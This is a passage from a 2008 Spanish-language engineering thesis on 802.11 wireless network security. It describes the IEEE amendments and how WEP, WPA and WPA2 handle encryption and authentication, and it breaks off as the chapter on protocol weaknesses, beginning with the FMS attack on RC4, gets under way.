proyecto fue la compania Atheros. Esta nueva tecnologia permite la comunicacion entre 
dispositivos mediante un protocolo unificado a velocidades de hasta 108 Mbps. 



3.4.7 802.1 1H (2004) 

En 2004 el IEEE realizo una nueva extension a 802. 1 1 especificando la norma "h". El 
objetivo principal de este grupo es cumplir los reglamentos europeos para redes inalambricas 
a 5 GHz. Los reglamentos europeos para la banda de 5 Ghz requieren que los productos 
tendran control de la potencia de transmision o TPC y seleccion de frecuencia dinamica o 
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DFS. El control TPC limita la potencia transmitida al minimo necesario para alcanzar al 
usuario mas lejano. DFS selecciona el canal de radio en el punto de acceso para reducir al 
minimo la interferencia con otros sistemas como el radar o satelites que utilicen la banda de 5 
Ghz. En un principio fue pensado para la regulacion europea ya que es aqui donde se 
producen mayores incompatibilidades de frecuencias en el espectro. Esta extension a la 
norma es capaz de detectar la presencia de otros dispositivos y realizar un salto en la 
frecuencia si se ha detectado portadora en ese canal. 

En el mercado encontramos productos de esta norma como por ejemplo el siguiente: 
D-Link AirPremier DWL-8220AP Wireless Switch Dualband Access Point 




Factor de forma: Externo 

Tipo de dispositivo: Punto de acceso inalambrico 

Tecnologia de conectividad: Inalambrico 

Velocidad de transferencia de datos: 54 Mbps 

Protocolo de interconexion de datos: IEEE 802.1 lb, IEEE 802.1 la, IEEE 802.1 lg 

Metodo de espectro expandido: OFDM, DSSS 

Algoritmo de cifrado: AES. WEP de 128 bits, WEP de 40 bits, TKIP, WPA 

Cumplimiento de normas: IEEE 802.11, IEEE 802.11b, IEEE 802.11a, IEEE 802.3af, 
IEEE 802.11g, IEEE 802. Hi, IEEE 802. llh 
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3.4.8 802.111(2004) 

802.1 li es una mejora importante, creada en 2004, con respecto a las primeras normas 
de seguridad inalambrica, como la que despues comentaremos Privacidad de Equivalencia 
Alambrica o WEP. El grupo Wi-Fi es el encargado de certificar los productos del estandar 
802.11, asi pues a finales de 2004 comenzo a certificar productos con funcionalidad de 
Acceso Protegido 2 o WPA2 (que tambien hablaremos mas adelante de ella). WPA esta 
basado en el borrador de la norma 802. Hi mientras que WPA2 se disefio utilizando la version 
final del estandar. 

La menor implantacion de la tecnologia inalambrica en el mundo empresarial se debe 
en gran parte a su falta de seguridad. Asi pues a medida que las compafiias incorporen la 
norma de seguridad 802.1 li en sus productos en uno o dos afios, los analistas esperan que 
haya una mejora considerable en la seguridad de la interconexion inalambrica. La norma 
802.1 li incluye la norma de codificacion avanzada (AES), que soporta claves de 128 bits, 192 
bits y 256 bits. La AES es una forma de codificacion mas fuerte que se encuentra en la actual 
especificacion de Acceso protegido de Wi-Fi (WPA). En principio garantiza que la 
informacion enviada por estas redes este encriptada y no pueda ser dafiada por alguien que la 
intercepte, veremos mas tarde en que medida esto es cierto. 802. Hi introduce el llamado 
protocolo de red segura robusta o RSN para establecer una comunicacion segura. A su vez 
implementa EAP protocolo extensible de autenticacion. 



3.4.9 802.1 U (2004) 

Este grupo de trabajo se dedico a compatibilizar los productos de la norma 802. 1 1 para 
el mercado Japones. Asi pues este estandar trabaja en la banda de los 5GHz y se encarga de 
adaptarse a la regulacion Japonesa para dispositivos inalambricos de interior exterior y 
aplicaciones moviles. Se encarga de definir los metodos por los cuales un AP puede moverse 
por diferentes canales para asi evitar interferencias. 
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3.4.10 802.1 IE (2005) 

Continuando con la evolucion del estandar, en 2005 802.1 le proporciona a la 
tecnologia IEEE 802.11 trafico en tiempo real en todo tipo de entornos y situaciones. Las 
aplicaciones en tiempo real son ahora una realidad por las garantias de Calidad de Servicio 
(QoS) proporcionado por el 802. lie. El objetivo del nuevo estandar "e" es introducir nuevos 
mecanismos a nivel de capa MAC para soportar los servicios que requieren garantias de 
Calidad de Servicio. Para cumplir con su objetivo IEEE 802. lie introduce un nuevo elemento 
llamado Hybrid Coordination Function (HCF) con dos tipos de acceso: 

• (EDCA) Enhanced Distributed Channel Access, proporciona prioridad a los 
paquetes, asi un usuario con mayor prioridad consigue, un menor tiempo de 
espera en entrega de paquetes. 



• 



(HCCA) Controlled Access, conforma una excelente funcion coordinadora 
permitiendo la configuracion de la calidad e servicio. 



3.4.11 Evolucion futura del estandar. 



• IEEE 802.11k - Calcula y valora los recursos de radiofrecuencia para una 
mejora de la gestion (2008?) 

• IEEE 802. 1 1 1 - Reservado 

• IEEE 802. 11m- Mantenimiento del estandar. 

• IEEE802.11n-500Mbit/s (2008) 

• IEEE 802. 1 1 o - Reservado 

• IEEE 802. lip- WAVE - Acceso inalambrico para vehiculos. (2008?) 

• IEEE 802. 1 1 q - Reservado 
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IEEE 802. llr - Movilidad en entornos inalambricos (2008?) 



IEEE 802.11s - ESS red de mallas (2008?) 



IEEE 802.1 IT - Prediccion de rendimiento en redes inalambricas (2008?) 



IEEE 802. 1 lu - Cooperacion con redes que no pertenecientes a la 802. 1 1 



IEEE 802. 1 lv - Gestion de red. 



IEEE 802. 1 1 w - Gestion protegida de marcos (2008?) 



IEEE 802. 1 lx - Reservado 



IEEE 802. 1 ly - Mitigacion de interferencias 



3.5 JUSTIFICACION DE LA ELECCION DEL PROYECTO. 

En un entorno en el que cada dia se maneja un volumen mayor de informacion en 
formato digital, la confidencialidad de los datos juega un papel muy importante en la 
Sociedad de la Informacion actual. 

Es por eso, que surge la necesidad de establecer barreras de acceso a los datos tan solo 
franqueables por las personas que interese. En esta "Aldea Global" donde todo esta 
interconectado la ruptura de estas protecciones por parte de terceras personas, puede producir 
dafios economicos o morales. 

Hoy en dia cualquier empresa puede disponer de puntos de acceso inalambricos, que 
den soporte y cobertura a sus empleados. Este sistema que introduce facilidad de movilidad, 
puede suponer un tremendo agujero de seguridad, para que personas ajenas, puedan penetrar 
en el sistema y roben informacion privilegiada. 

El estandar 802.11 es una tecnologia practicamente reciente, que esta en plena 
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expansion. Se espera que en unos afios pueda sustituir a otros estandares LAN cableados. El 
principal motivo que puede detener su crecimiento es la mencionada carencia de seguridad. 

Parte de la motivacion del proyecto es analizar los metodos obsoletos de seguridad e 
introducir las nuevas aproximaciones que existen o se incorporaran en un futuro reciente. 

La mayor parte de las companias e instituciones confian en esta tecnologia para 
ofrecer soluciones inalambricas a sus necesidades. Esta decision puede suponer una aumento 
de exposicion al riesgo de intrusiones y robo de informacion, sino se toman las medidas 
adecuadas o se realiza un uso correcto del estandar. Es por ello que es de vital importancia 
tener siempre presente cuales son las carencias de seguridad de esta tecnologia, ya que 
permite a un usuario mal intencionado actuar desde un perimetro exterior a las instalaciones 
atacadas. 
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4 Protocolos de seguridad 

El estandar inalambrico de comunicaciones IEEE802.il y sus diversos grupos de 
trabajo posteriores establecen la posibilidad de conferir a esta tecnologia, capacidades de 
integridad de datos, confidencialidad y autenticidad de las estaciones. De esta manera existen 
3 protocolos de seguridad basados en la norma IEEE802. 1 1 y IEEE802. Hi: 

• WEP como parte de la norma IEEE802. 1 1 

• WPA como borrador de la norma IEEE802. Hi 

• WPA2 como parte de la norma IEEE802. Hi 

De esta manera y con el objetivo de poder comprender las vulnerabilidades que 
afectan a cada uno de estos protocolos es necesario definir su funcionamiento. Estableciendo 
principalmente la manera en que las estaciones se autentican en el AP y el cifrado en las 
comunicaciones utilizado, conceptos de seguridad claves para el analisis realizado. 



4.1 ProtocoloWEP 

4.1.1 Definicion 

WEP (Wired Equivalent Privacy, Privacidad Equivalente al Cable) es el algoritmo 
opcional de seguridad para brindar proteccion a las redes inalambricas, incluido en la primera 
version del estandar IEEE 802.11, mantenido sin cambios en las nuevas 802,11a , 802.11b y 
802. llg, con el fin de garantizar compatibilidad entre distintos fabricantes. El WEP es un 
sistema de encriptacion estandar soportado por la mayoria de las soluciones inalambricas. 
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Pero ^por que cifrar las comunicaciones inalambricas?. El entorno de Radio Frecuencia es un 
canal de comunicacion inseguro, ya que cualquier estacion dentro del rango de la serial puede 
recibir los datos emitidos por otra. Conscientes de ello el IEEE implemento un mecanismo de 
seguridad que pudiera otorgar al medio inalambrico las caracteristicas del cableado, todo ello 
sin demasiado exito, como en secciones posteriores comprobaremos. 

Aunque en los entornos de RF (Radio Frecuencia) pueden residir las escuchas ilegales 
pasivas, la unica forma efectiva de prevenir que alguien pueda comprometer los datos 
transmitidos consiste en utilizar mecanismos de cifrado. El proposito de WEP es garantizar 
que los sistemas inalambricos dispongan de un nivel de confidencialidad equivalente al de las 
redes LAN cableadas, mediante el cifrado de los datos que son transportados por las sefiales 
de radio. Cabe destacar que un proposito secundario de WEP es el de evitar que usuarios no 
autorizados puedan acceder a las redes WLAN (es decir, proporcionar autenticacion). Este 
proposito secundario no esta enunciado de manera explicita en el estandar 802.11, pero se 
considera una importante caracteristica del algoritmo. 

WEP utiliza una misma clave simetrica y estatica en las estaciones y el punto de 
acceso. El estandar no contempla ningun mecanismo de distribucion automatica de claves, lo 
que obliga a escribir la clave manualmente en cada uno de los elementos de red. Esto genera 
varios inconvenientes. Por un lado, la clave esta almacenada en todas las estaciones, 
aumentando las posibilidades de que sea comprometida. Y por otro, la distribucion manual de 
claves provoca un aumento de mantenimiento por parte del administrador de la red, lo que 
conlleva, en la mayoria de ocasiones, que la clave se cambie poco o nunca. 



4.1.2 Cifrado 

Una vez definido los propositos por el cual el IEEE decidio crear WEP hablemos del 
mencionado cifrado. WEP utiliza una clave secreta compartida entre una estacion inalambrica 
y un punto de acceso. Todos los datos enviados y recibidos entre la estacion y el punto de 
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acceso pueden ser encriptados utilizando esta clave compartida mediante el algoritmo de 
cifrado RC4 de RSA1 Data Security. Para proteger los datos a transporter frente a 
modificaciones no autorizadas mientras esta en transito, WEP aplica un algoritmo de 
comprobacion de integridad (CRC-32) al texto en claro, lo que genera un valor de 
comprobacion de integridad (ICV). Dicho valor de comprobacion de integridad se concatena 
con el payload a transmitir en claro. El valor de comprobacion de integridad es, de hecho, una 
especie de huella digital de los datos a transmitir. Otro concepto que tiene que quedar claro es 
el llamado vector IV, dicho vector es simplemente una numeracion que se adjunta a cada 
paquete WEP y que es utilizado tanto para cifrar el mensaje como para descifrarlo. Mas 
adelante explicaremos el proposito de dicho vector de inicializacion. 

El algoritmo de encriptacion utilizado RC4 segun el estandar es de 64 bits, pudiendo 
alcanzar incluso 128 bits. Estos 64 bits estan formados por 24 bits correspondientes al vector 
de inicializacion mas 40 bits de la clave secreta. Los 40 bits son los que se deben distribuir 
manualmente. El vector de inicializacion (IV), en cambio, es generado dinamicamente y 
deberia ser diferente para cada trama. El objetivo perseguido con el IV es cifrar con claves 
diferentes para impedir que un posible atacante pueda capturar suficiente trafico cifrado con la 
misma clave y terminar finalmente deduciendo la clave. Como es logico, ambos extremos 
deben conocer tanto la clave secreta como el IV. Lo primero sabemos ya que es conocido 
puesto que esta almacenado en la configuracion de cada elemento de red. El IV, en cambio, se 
genera en un extremo y se envia en claro en la propia trama al otro extremo, por lo que 
tambien sera conocido. Observemos que al viajar el IV en cada trama es sencillo de 
interceptar por un posible atacante. 

Profundicemos un poco mas en las partes y el funcionamiento de RC4 ya que como 
veremos en secciones posteriores supone uno de los puntos debiles del protocolo WEP. RC4 
consta de dos modulos diferenciados, un algoritmo barajador o programador de claves 
llamado KSA y un modulo de generacion de numeros pseudoaleatorios denominado PRNG 
(Pseudo Random Number Generator), ambos implementados por Ron Rivest en 1987 y 
publicados de manera clandestina en 1994. 



1 Division de seguridad de la empresa EMC" 'http://people.csail.mit.edu/rivest/ 
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KSA (Key Scheduling Algorithm) es un pequefio algoritmo de programacion de claves 
que toma como entrada el par IV-Clave secreta. Dicha entrada consiste en una trama de 64 o 
128 bits dependiendo del cifrado utilizado. Como resultado genera un vector S de 256 
elementos totalmente desordenados. 

PRNG toma como entrada el mencionado vector S generado como salida una trama 
de bits pseudoaleatoria de igual tamafio a los datos a cifrar. 



4.1.3 AUTENTICACION 

WEP proporciona dos tipos de autenticacion: un sistema abierto, en el que todos los 
usuarios tienen permiso para acceder a la WLAN, y una autenticacion mediante clave 
compartida, que controla el acceso a la WLAN y evita accesos no autorizados a la red. 

De los dos niveles, la autenticacion mediante clave compartida es el modo menos 
seguro y mas adelante explicaremos el porque. En el se utiliza una clave secreta compartida 
entre todas las estaciones y puntos de acceso del sistema WLAN y que coincide con la clave 
de cifrado. Cuando una estacion trata de conectarse con un punto de acceso, este replica con 
un texto aleatorio, que constituye el desafio (challenge). La estacion debe utilizar la copia de 
su clave secreta compartida para cifrar el texto de desafio y devolverlo al punto de acceso, con 
el fin de autenticarse. El punto de acceso descifra la respuesta utilizando la misma clave 
compartida y compara con el texto de desafio enviado anteriormente. Si los dos textos son 
identicos, el punto de acceso envia un mensaje de confirmacion a la estacion y la acepta 
dentro de la red. Si la estacion no dispone de una clave, o si envia una respuesta incorrecta, el 
punto de acceso la rechaza, evitando que la estacion acceda a la red. 

La autenticacion en modo abierto ya fue comentada en el apartado 2.2.3, asi que en 
esta seccion comentaremos tan solo el hecho de que dicho metodo represente un nivel de 
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seguridad mayor que utilizar una autenticacion con clave compartida. Asi pues cuando una 
estacion utiliza clave compartida para autenticarse contra el punto de acceso una tercera 
estacion que permanezca a la escucha podria interceptar el saludo o handshake para un 
posterior ataque por diccionario o fuerza bruta que determinara la clave compartida. Pudiendo 
asi descifrar todo el trafico de la red tan solo capturando el reto y la contestacion por parte de 
la estacion licita. 



4.1.4 FUNCIONAMIENTO 

A continuacion definiremos la metodologia implementada por WEP para 
cifrar/descifrar una trama de datos con destino el medio inalambrico, asumiendo que se utiliza 
una encriptacion de 64 bits. 

1 . En primera instancia la clave compartida formada por una cadena de 40 bits a 
la cual se le concatena un vector de inicializacion IV de 24 bits formando asi 
una cadena de 64bits. 

2. Se calcula el CRC-32 de los datos que se quieren cifrar (hasta 2312 bates) 
tambien llamado ICV, formando el par Datos+ICV. 

3. Se aplica el algoritmo PRNG (Pseudo Random Number Generator) de RC4 a la 
cadena que contiene la clave compartida mas el vector de inicializacion, 
resultando el llamado Keystream de igual longitud que la salida del paso 
numero 2. 

4. Finamente se aplica la funcion XOR entre el Keystream y el par Datos+ICV . 

5. Al resultado anterior se le anade en claro el rv utilizado y la cabecera 
IEEE802.1 1 resultando una trama cifrada y lista para transmitir. 
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La siguiente figura ilustra el procedimiento completo, tanto para el proceso de cifrado 
como para el de descifrado. 



CLAVE 
COMPARTIDA 

40/1 04 Bit 



IV 

24 Bit 



RC4 



TEXTO EN CLARO 



ICV 



CRC-32 



^ 



-<g> 



XOR 



TRAM A ENCRIPTADA 



IV 



Key ID 



Payload 



I |C I 



IV 

24 Bit 



DESCIFRADO 



CLAVE 
COMPARTIDA 

40/1 04 Bit 



RC4 



-<§H 



TEXTO EN CLARO 



XOR 



T^ 



ICV 



T 



43 -CRC-32?* J 



Figura 4.1: Cifrado y Descifrado mediante WEP 



En este momento la trama ha sido inyectada al medio de RF siendo recibida por la 
estacion destino. Cabe destacar que en todo momento la cabecera de la trama 802.11 viaja en 
claro pudiendo ser interpretada por cualquier estacion que este a la escucha en el medio. Los 
datos que se pueden extraer de una trama encriptada y no siendo conocedor de la clave 
compartida serian, la direccion del BSSID, direccion destino, direccion origen ,IV utilizado. 
Asi pues un receptor licito que fuera conocedor del secreto compartido procederia a 
desencriptar la trama de la siguiente manera. 

1. El receptor, extrae de la trama el valor del IV transmitido en claro, 
concatenandole dicho valor a la Have que tanto emisor y receptor conocen. 

2. Seguidamente se le aplica RC4 resultando un Keystrem de longitud igual a los 
datos cifrados 
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3. Se realiza la operacion XOR entre el Keystream y los datos cifrados. 

4. Resultando el texto en claro mas la comprobacion de redundancia ciclica. 

5. Se comprueba que la trama es valida mediante el calculo del CRC-32 
correspondiente. 



4.2 Protocolo WPA 
4.2.1 Definicion 

WPA (Wi-Fi Protected Access) fue desarrollado por la Wi-Fi Alliance y el IEEE en 
2003 como resultado de aplicar el borrador del estandar IEEE 802. Hi. Su principal objetivo 
era cubrir todas aquellas carencias de seguridad detectadas en el protocolo de seguridad nativo 
de 802. 1 1 WEP. Cabe destacar que WPA no representa un protocolo que pueda asegurar una 
proteccion cien por cien del medio inalambrico ya que como en muchos casos esto depende 
en gran parte del usuario final. WPA es un estandar a nivel MAC orientado tanto al mundo de 
la pequefia oficina y el usuario domestico como a grandes empresas. 

Las principales caracteristicas de WPA son: 

• Distribucion dinamica de claves 

• Incremento de la robustez del vector de inicializacion 

• Aplica nuevas tecnicas de integridad y autenticacion 



1 Wi-Fi Alliance es una asociacion internacional sin animo de lucro creada en 1999, con el objetivo de certificar 
productos derivados del estandar 802. 1 1 . 
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4.2.2 AUTENTICACION 

Prestaremos especial atencion al metodo empleado por WPA para autenticar a las 
estaciones ya que supondra uno de los puntos debiles de este protocolo de seguridad. Por lo 
que respecta a la autenticacion, en funcion del entorno de aplicacion, es posible emplear dos 
modos de autenticacion diferentes WPA-PSK (Pre Shared Key) o WPA EAP (Extensible 
Autentication Protocol). 

En entornos personates, como usuarios residenciales y pequefios comercios, se utiliza 
WPA con clave pre-compartida o tambien llamada WPA-PSK y autenticacion IEEE802.1X. 
En estos entornos no es posible contar con un servidor de autenticacion centralizado o un 
marco EAP. Es este contexto WPA se ejecuta en un modo especial conocido como "Home 
Mode" o PSK, que permite la utilizacion de claves configuradas manualmente y facilitar asi el 
proceso de configuracion del usuario domestico. 

El usuario unicamente debe introducir una clave de 8 a 63 caracteres, conocida como 
clave maestra, en su punto de acceso, modem o router inalambrico residencial, asi como en 
cada uno de los dispositivos que quiere conectar a la red. De esta forma solo se permite 
acceso a aquellos dispositivos que son conocedores de la contrasena, lo que evita ataques 
basados en escuchas asi como acceso de usuarios no autorizados. En segundo lugar se puede 
asegurar que la clave proviene de una relacion de acuerdo unico para generar el cifrado TKIP 
(Temporal Key Integrity Protocol) en la red, el cual describiremos mas a delante. Por lo tanto 
la contrasena preestablecida para la autenticacion es compartida por todos los dispositivos de 
la red, pero no son las claves de cifrado, que son diferentes para cada dispositivo, lo que 
representa una mejora en cuanto a WEP. En general WPA parece representar un nivel 
superior en cuanto a la seguridad que ofrecia WEP. 

A diferencia de WEP , WPA utiliza varias claves temporales diferentes para cifrar el 
payload dependiendo del trafico al que pertenece el paquete, unicast, broadcast o multicast y a 
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las que denomina PTK (Primary Temporal Key) para el primero y GTK (Group Temporal 
Key) para los dos restantes. Estas Keys sufren un proceso de regeneracion de claves cada 
cierto tiempo, con el objetivo de impedir que una estacion legitima pueda llegar a capturar la 
clave de sesion utilizada. 

La PSK es conocida por todas las estaciones del medio ademas del AP y esta formada 
por una serie de valores dependientes del escenario. Cabe destacar que la PSK no es la 
cadena utilizada para encriptar los paquetes de datos. Ni siquiera se utiliza como tal para 
autenticar la estacion en el AP, sino que se construye la llamada PMK (Primary Master Key), 
a partir de la PSK y un proceso de modificacion. El resultado es una cadena de 256 bits. Pero, 
^que elementos se utilizan para construir dicha PMK?. Muy facil, la contrasefia 
precompartida, el ESSID del AP, la longitud del ESSID, y un barajado de 4096 procesos. 
Todo ello es generado por una funcion matematica llamada PBKDF2 ofreciendo como 
resultado una clave PMK de 256 bits. 

PMK = PBKDF2 1 (Frase secreta, ESSID, Long(ESSID), 4096, 256) 

Una vez obtenida esta clave puede comenzar el proceso de autenticacion con el AP al 
que se denomina 4-Way Handshake o saludo inicial representado en la figura siguiente. 



1 PBKDF2 es una funcion de PKCS #5 v2.0: Password-based Cryptography estandar 
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Figura 4. 2: 4-way handshake 



Asi pues tanto la estacion como el AP generan a partir de los siguientes valores la PTK 
y la GTK utilizada para cifrar los datos. Siendo ambas diferentes en cada sesion. 

Pero, ^Como es generada esta PTK?, para ello se utiliza una funcion pseudoaleatoria 
PRF-X que toma como fuente los datos siguientes: 

• PMK : Calculada mediante la PSK y el algoritmo PBKDF2. 

• SNonce : Numero aleatorio determinado por la estacion. 

• ANonce : Numero aleatorio determinado por el AP. 



73 de 200 



Roberto Amado Gimenez 
06/03/2008 



m 




Escola Tecnica Superior D'Enginyeria 
Analisis De La Seguridad En Redes 802.11 

• MAC del AP : MAC del punto de acceso 

• MAC de la estacion 

En este momento, la comunicacion es iniciada mediante el envio de un paquete tipo 
"EAPOL start" desde la estacion al AP. Seguidamente el AP genera un numero aleatorio 
"ANonce" que es transmitido a la estacion. Esta contesta remitiendole otro numero aleatorio 
SNonce. En estos momentos ambos pueden generar ya su PTK con la que cifraran el trafico 
unicast, a partir de los valores mencionados. A su vez el AP esta en disposicion de generar la 
GTK procediendo a transmitirla a la estacion de forma cifrada. Por ultimo se envia un paquete 
de reconocimiento cerrando asi el proceso de autenticacion. En la figura anterior se puede 
apreciar las operaciones realizadas para el calculo de la PTK. 

En cuanto a la autenticacion en entornos empresariales los requerimientos estrictos de 
cifrado y autenticacion hacen que sea mas adecuada la utilizacion de WPA con los 
mecanismos IEEE802.1X y el protocolo de autenticacion extensible EAP, que disponen de 
procedimientos de gestion de claves dinamicos. EAP es utilizado para el transporte extremo a 
extremo para los metodos de autenticacion entre el dispositivo de usuario y el punto de 
acceso. Mientras que IEEE802.1X es utilizado como marco para encapsular los mensajes 
EAP en el enlace radio. El conjunto de estos dos mecanismos junto con el esquema de cifrado 
forman una fuerte estructura de autenticacion, que utiliza un servidor de autenticacion 
centralizado, como por ejemplo RADIUS. 



4.2.3 Cifrado 

En cuanto al cifrado, el equipo de desarrollo de WPA trato de paliar las 
vulnerabilidades conocidas por WEP, incorporando las siguientes mejoras. 

Creacion de un vector de inicializacion extendido a 48 bits frente a los 24 bits de 
WEP, a su vez aplicaron reglas de secuenciacion para la numeracion. 
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Nuevos mecanismos de derivacion y distribucion de claves. Gracias a la incorporacion 
de metodos de intercambio inicial de numeros aleatorios evitando asi ataques de "man in the 
middle". 

WPA utiliza TKIP (Temporal Key Integrity Protocol) como encriptacion, para la 
generacion de claves por paquete, TKIP utiliza el algoritmo de cifrado RC4, al igual que su 
predecesor WEP, pero elimina el problema de las claves estaticas compartidas, como veremos 
en posteriores secciones. A su vez TKIP incrementa el tamafio de las claves pares y claves en 
grupo para el cifrado de datos de los 40 bits de WEP se pasa a un cifrado de 128 bits. Ademas 
las claves empleadas no son compartidas por todos los usuarios de la red. 

WPA utiliza TKIP para codificar los datos. El mencionado cifrado utiliza una semilla 
inicial de 128 bits compartida por todos los usuarios y los puntos de acceso. Despues esa 
clave temporal se combina con la direccion MAC del usuario y se le anade un vector de 
inicializacion de 16 bits para producir la clave que cifrara los datos, mediante este proceso 
cada usuario utilizara diferentes claves para la encriptacion. 

TKIP fuerza por defecto un cambio de las claves entre el usuario movil y el punto de 
acceso para cada paquete de informacion transmitida y aplicando un algoritmo de "Hash" o 
mezclado a los valores del vector de inicializacion, es decir, se cifra dicho vector, por lo que 
es mas complicado averiguar su valor. El cambio de la clave de cifrado esta sincronizado 
entre el usuario y el punto de acceso. Pero no todo es bueno en este protocolo cabe destacar el 
hecho de que establecer todas estas medidas de seguridad suponen un aumento del Overhead 
de la comunicacion ya que los paquetes de datos han de llevar una sobrecarga de gestion. 

Ademas WPA implementa como WEP, control de integridad de mensaje, pero con 
mayor robustez. WPA incluye el llamado MIC o "Michael" para verificar que un paquete no 
ha sido alterado por una estacion ilicita. La funcion MIC, es un Hash criptografico de un solo 
sentido, el cual reemplaza al CRC-32 utilizado en WEP. "Michael" provee una funcion 
matematica de alta fortaleza en la cual el receptor y el transmisor deben computar, y luego 
comparar, sino coinciden los datos se asumen como corruptos desechando el paquete. De este 
modo, TKIP impide que un atacante pueda alterar los datos que se transmiten dentro de un 
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paquete. 



4.2.4 FUNCIONAMIENTO 

Hasta este momento ya hemos determinado de que forma se produce el proceso de 
autenticacion en WPA, punto debil del protocolo. A continuacion comentaremos brevemente 
como se produce el cifrado de la informacion para una trama unicast. 

1. Inicialmente se genera el IV correspondiente al paquete a enviar, esta 
numeracion comienza en 0. Mediante el IV la direccion de destino y la PTK se 
genera la semilla que utilizara el algoritmo de cifrado RC4. 

2. Mediante la funcion PNRG se genera la cadena utilizada para cifrar los datos. 

3. Por otra parte la MAC origen y destino, la priori dad del paquete y los datos a 
remitir son pasados como entrada al algoritmo de control de integridad 
"Michael". 

4. Seguidamente se calcula el ICV (un CRC-32)de la cadena MIC (salida de 
"Michael"). 

5. Se produce a continuacion la operacion XOR entre la terna Datos+MIC+ICV y 
la cadena de cifrado salida del PNRG. 

La siguiente figura ilustra el proceso de encriptacion de una trama 802. 1 1 
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Figura 4.3: Encriptacion de una trama 802.11 mediante WPA 

Para desencriptar una trama cifrada mediante TKIP se realizarian las siguientes 
operaciones. 

1. Se desencapsula el IV, el IV ext, la direccion de destino que son concatenados 
con la clave PTK. 

2. La cadena resultante es introducida como entrada al algoritmo PNRG 
generando la clave de cifrado de paquete. 

3. A continuacion se procede a realizar la XOR entre los datos encriptados y la 
clave de cifrado calculada anteriormente. 

4. La salida del punto anterior genera los datos en claro, a los cuales se les aplica 
"Michael" par comprobar su integridad. 
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La siguiente figura ilustra todo el proceso mencionado. 
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Figura 4.4: Desencriptacion trama 802.11 mediante WPA 



Con todo lo mencionado hasta el momento estamos en disposicion de poder entender 
cuales son los puntos debiles del protocolo WPA, esto se analizara en posteriores secciones. 



4.3 WPA2 



La alianza Wi-Fi lanzo en septiembre de 2004 el protocolo de seguridad WPA2, que 
suponia ser la version certificada interoperable de la especificacion completa del estandar 
IEEE802.1H, que fue ratificado en junio de 2004. Para llevar a cabo la certificacion se basa 
en las condiciones obligatorias de la ultima version del estandar IEEE802.1H. WPA2 es, por 
tanto, la implementacion aprobada por la Wi-Fi Alliance interoperable con el estandar 
IEEE802.1H. 
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Aunque los productos WPA siguen siendo seguros, afirmacion que discutiremos en el 
analisis posterior, muchas organizaciones han estado buscando una tecnologia interoperable y 
certificada basada en el estandar IEEE802.1 li o han requerido del cifrado de AES por razones 
internas o reguladoras. WPA2 resuelve estas necesidades, basandose en su predecesor WPA 
(con el que es completamente compatible hacia atras) y ha sido especificamente disenado 
para cumplir los requisitos mas exigentes de entornos empresariales. 

IEEE802.1H y WPA2 son virtualmente identicos, siendo las diferencias entre ambos 
minimas. Ambos emplean como codigo de cifrado AES/CCMP en lugar de RC4/TKIP usado 
en WPA. A su vez existen dos desviaciones principales: 

1. WPA2 permite funcionar en modo mixto con TKIP y CCMP para su 
compatibilidad hacia atras con WPA. 

2. WPA2 carece de ciertos aspectos definidos por IEEE802.1H en cuanto a 
servicios de voz inalambricos utilizados para prevenir la latencia de la serial o 
la perdida de informacion durante el roaming. 

En cuanto a su relacion con WPA, la principal las diferencias de WPA2 respecto a 
WPA es que emplea, al igual que IEEE802.1H un mecanismo de cifrado mas avanzado como 
AES. No obstante, WPA2 es compatible con WPA. Por ello, alguno s productos WPA pueden 
ser actualizados a WPA2 por software. Otros en cambio, requieren de un cambio en el 
hardware debido a la naturaleza de computo intensiva del cifrado requerido para WPA2, AES. 

Por otro lado, al igual que WPA, WPA2 permite dos modos de llevar a cabo la 
autenticacion segun si el ambito de aplicacion es empresarial (IEEE802.1X/EAP) o personal 
(PSK). Actualmente el IEEE y la Wi-Fi Alliance estan intentando unificar WPA2 y 
IEEE802.1H. 
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4.3.1 AUTENTICACION 

Como hemos comentado anteriormente WPA2 utiliza los protocolos de autenticacion 
definidos por el IEEE802. 1 li y descritos anteriormente para el protocolo WPA. 



4.3.2 ClFRADO 

El proceso de cifrado de la informacion se realiza mediante lo establecido por el 
estandar IEEE802.1H y ya visto en la seccion de WPA. Como ya se ha comentado 
anteriormente la principal diferencia entre WPA y WPA2 es la mejora de su algoritmo de 
cifrado. El ya utilizado por WEP y WPA RC4 es sustituido por AES, un cifrado de bloques de 
clave simetrica que utiliza grupos de bits de una longitud fija. Un algoritmo de clave simetrica 
significa que utiliza la misma clave maestra tanto para cifrar como para descifrar los datos. 

Mediante AES, las tramas de bits del texto piano son cifradas en bloques de 128 bits 
calculados independientemente. Queda fuera del alcance de este proyecto profundizar y 
describir el proceso de cifrado AES, pero tendremos siempre presente que representa un 
sistema de cifrado mucho mas robusto que sus antecesores. 
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5 DEBILIDADES DE LOS PROTOCOLOS Y ATAQUES 

Esta seccion es el resultado de realizar un analisis teorico y practico de los sistemas 
actualmente existentes, para proteger el medio de radio frecuencia, de posibles alteraciones en 
los datos transmitidos o de intrusiones no deseadas en la red. 

De esta manera para cada uno de los protocolos inalambricos, se ha desarrollado un 
estudio teorico de las carencias de seguridad y vulnerabilidades descubiertas hasta la fecha, 
realizando un analisis profundo de los errores acometidos y la forma de explotarlos. 

Con el objetivo de demostrar que dichas vulnerabilidades pueden suponer un grave 
problema de seguridad en los activos tecnologicos de una institution, empresa o particular, se 
ha realizado un estudio practico que demuestra como se puede obtener el acceso a una red 
protegida con los protocolos estudiados o como es posible realizar denegaciones de los 
servicios ofrecidos por los puntos de acceso desplegados. 

Para el estudio teorico se ha realizado una profunda revision del estado de las 
investigaciones actuates sobre es estandar, recopilando las principales carencias y metodos de 
ataque clasificados por el protocolo utilizado. 

La parte practica, en primera instancia presenta el conjunto de herramientas que 
actualmente han sido desarrolladas para llevar a cabo los diferentes ataques definidos en el 
apartado teorico. A continuation y tras un proceso de selection de las aplicaciones a utilizar, 
se presenta el escenario y la maqueta de pruebas . En ultimo lugar se recopila la metodologia 
a seguir para llevar a la practica los diferentes ataques. 
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5.1 WEP 

5.1.1 ESTUDIO TEORICO DE LA VULNERABILIDAD 
5.1.1.1 ATAQUES ESTADISTICOS 

FSM, Debilidad en RC4 

La vulnerabilidad descubierta por Scott Fluhrer , Itsik Mantin y Adi Shamir (2001) 
analizada en el paper "Weakness in the Key Scheduling Algorithm of RC4" y a la que a 
partir de ahora nos referiremos como FMS, trata de explotar diversas carencias en el 
algoritmo RC4 que permiten la obtencion de la clave de cifrado utilizando para ello ataques 
estadisticos. Con diferencia este ataque supone una vulnerabilidad total del sistema de cifrado 
WEP ya que no solo es posible desencriptar un paquete de datos sino que es posible obtener la 
